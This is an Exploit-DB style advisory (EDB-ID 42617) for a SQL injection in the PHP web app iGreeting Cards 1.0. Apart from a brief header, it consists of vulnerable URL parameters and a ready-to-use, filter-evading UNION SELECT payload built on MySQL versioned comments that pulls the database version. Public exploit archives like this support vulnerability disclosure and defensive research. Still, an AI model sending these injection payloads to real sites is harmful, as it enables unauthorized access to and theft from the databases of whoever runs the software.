iGreeting Cards 1.0 - SQL Injection

EDB-ID:

42617

CVE:

N/A




Platform:

PHP

Date:

2017-09-04


# # # # # 
# Exploit Title: iGreeting Cards 1.0 - SQL Injection
# Dork: N/A
# Date: 04.09.2017
# Vendor Homepage: http://coryapp.com/
# Software Link: http://coryapp.com/?product&index
# Demo: http://coryapp.com/demo/greetingcards/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 	
# Proof of Concept:
# 
# http://localhost/[PATH]/index.php?index&search&k=[SQL]
# 
# eFe'+/*!11112UnIoN*/(/*!11112SelEcT*/+0x283129,VERSioN(),0x283329,0x283429,0x283529,0x283629,0x283729,0x283829)--+-
# 
# http://localhost/[PATH]/index.php?index&index&p=[SQL]
# 
# http://localhost/[PATH]/index.php?category&index&id=[SQL]
# 
# Etc..
# # # # #